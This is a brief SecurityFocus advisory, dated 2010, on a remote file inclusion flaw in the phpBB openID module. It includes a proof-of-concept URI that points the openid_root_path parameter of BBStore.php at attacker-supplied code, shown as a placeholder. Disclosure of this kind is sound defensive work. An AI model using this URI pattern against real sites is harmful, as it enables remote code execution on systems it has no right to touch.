phpBB openID OPENID_ROOT_PATH Parameter Remote File Include Vulnerability

An attacker can exploit these issues via a browser.

The following proof-of-concept URI is available:

http://www.example.com/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=[ Evil Code ]


 

Privacy Statement
Copyright 2010, SecurityFocus